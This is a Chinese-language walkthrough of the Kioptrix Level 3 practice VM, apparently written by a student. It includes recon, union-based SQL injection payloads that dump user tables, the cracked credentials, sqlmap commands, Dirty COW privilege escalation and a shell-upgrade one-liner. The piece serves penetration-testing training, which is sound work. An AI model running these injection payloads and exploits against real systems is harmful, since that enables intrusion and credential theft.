序列
个人博客:https://www.xenoecho.us.kg/
喜欢的朋友可以搜索公众号“泷羽Sec-小篮子”还有文章中和渗透中工具和文章在筹备着,另外学习没思路?安全不知道怎么学习的朋友可以了解一下公众号内的红队全栈公益课,以及OSCP证书报考指南哦!
基本信息
- 基本信息攻击机:192.168.38.128;靶机:192.168.38.132;靶机Kioptrix-Leve 3
web样式无法显示的问题
- 原因:样式是以这个域名为基准链接的,而这个域名解析其实要到本地靶机的地址的。
修改hosts文件,将这个域名指向靶机地址,然后刷新一下就可以正常显示了。
echo "192.168.38.132 kioptrix3.com" >>/etc/hosts
信息收集
dirb目录扫描
dirsearch目录扫描
whatweb指纹
nmap服务扫描
- 只有
80和22端口开放的
主机详细信息
- 操作系统:Ubuntu Liunx
- 内核版本:Linux 2.6.9 - 2.6.33
服务信息
| 端口 | 服务 | 版本 |
|---|---|---|
| 22/tcp | ssh | OpenSSH 4.7p1 |
| 80/tcp | http | Apache httpd 2.2.8 |
| php | 5.2.4-2ubuntu5.6 |
查找攻击点
Web服务|80
页面探索
根据扫描出来的页面进行访问查看有无可疑点,例如常见的一些Web漏洞。
cache路径
- 三个页面返回404,
now进入到另一个目录的页面。
gallery路径
- 不同照片跳转不同路径的页面
- 照片页面有传参,后续尝试抓包测试
参数测试
- 参数对应,除了能改评分多少似乎没任何作用,阿巴阿巴。。。
- 只能改一次!给了个50分。
针对路径扫描
- 针对
/gallery/路径重新扫描一遍,有时候会遗漏掉一些铭感文件或路径。
- 数据库文件,暂时先留着。
- 照片管理后台和泄露的版本文件。尝试万能密码无效果。
- 发现页面存在SQL注入,根据后台版本去查找
poc刚好也指向这个页面
SQL手动测试
order by根据第七个字段进行排序的时候报错了,证明只有六个字段
id=1 order by 6 --
- 联合查询六个字段,只显示查询的2,3字段,判断出显错点为2,3。
1 union select 1,2,3,4,5,6 --
- 根据已知的显错点,将字段查询改为数据库查询。得知数据库为
gallery
1 union select 1,2,database(),4,5,6 --
- 查询
gallery数据库中含有的表
1 union select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema="gallery" --
- 注意到有个
users表,查询他表的字段,注意到有用户名和密码字段
1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name="gallarific_users" --
- 查询表中用户名和密码字段的数据
1 union select 1,group_concat(username),group_concat(password),4,5,6 from gallarific_users
- 不过这个是博客后台的登录密码,回到了之前发现的后台页面登录进去,尝试文件上传,无效果。
- 继续查询,注意到一可疑的
dev_accounts。查询字段
1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name="dev_accounts"
- 查询表中的数据
1 union select 1,group_concat(username),group_concat(password),4,5,6 from dev_accounts
- 通过MD5解密得知用户对应的密码,解密的网站:MD5在线解密原理其实和碰撞一样,不过碰撞需要时间。而他有数据库记录了一些常见的。
| 用户名 | 密码 |
|---|---|
| dreg | Mast3r |
| loneferret | starwars |
sqlmap|工具注入
#获取当前数据库
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch --current-db
#查询数据库中的表
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch -D gallery -tables
#获取表的数据
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch -D gallery -T gallarific_users,dev_accounts --dump
用户提权|方法一
- 尝试SSH登录两个账户需要指定密钥,权限等级都为普通权限
ssh -oHostKeyAlgorithms=+ssh-rsa loneferret@192.168.38.132
- 查看系统内核架构和版本
- 查找
poc,ubuntu下没可用poc内核需要进一步使用。
-m复制到当前目录利用python的http服务上传上去。漏洞名字为:Dirty COW
- 根据
exp提示输入新密码,然后等待一段是时间就创建出一个新的用户和密码。
- 使用新用户和密码登录,直接是管理员权限了。
phpmyadmin目录
- 一个phpmyadmin登录页面。
- 用户名使他闭合成功登录进去,不过看了看只能看到表的结构看不到内容
whatweb获取指纹的版本信息,查找poc,未发现可留用点。
- 管理系统的安装,不过没密码,尝试万能密码没效果。尝试使用上一个目录的密码也无效果。
根目录
- 通过探索发现存在两个传参测试能爆出路径,不过不是伪协议。
- 在登录页面测试,不存在
sql注入,注意到下面有个技术支持的,这个在信息收集中很重要。
- 查找相关的
poc,发现存在历史漏洞,不过第一个要用msf掠过先去看第二个多个漏洞的poc
- 只存在
XSS和CSRF打靶机时没作用。。。。
- 查找到一个远程命令执行
exp,git下载测试并执行。exp地址:地址
- 最近刚学到的一个方式来执行
bash,通过python来创建一个提示python -c 'import pty;pty.spawn("/bin/bash")'
- 获取系统信息
- 使用
exp获取,和上一个方法一样提权。
- 登录提权成功